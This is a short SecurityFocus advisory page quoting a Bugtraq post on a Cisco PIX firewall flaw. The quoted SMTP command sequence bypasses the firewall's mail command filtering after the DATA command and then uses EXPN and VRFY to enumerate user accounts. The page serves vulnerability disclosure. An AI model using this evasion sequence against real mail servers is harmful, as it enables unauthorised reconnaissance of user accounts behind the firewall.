Cisco PIX Firewall SMTP Content Filtering Evasion Vulnerability

From naif <naif@inet.it>'s Bugtraq post:

Here an example of what i could do exploiting this bug:
helo ciao
mail from: pinco@pallino.it
data ( From here pix disable fixup)
expn guest ( Now i could enumerate user
vrfy oracle and have access to all command)
help
whatever command i want
quit


 

Privacy Statement
Copyright 2010, SecurityFocus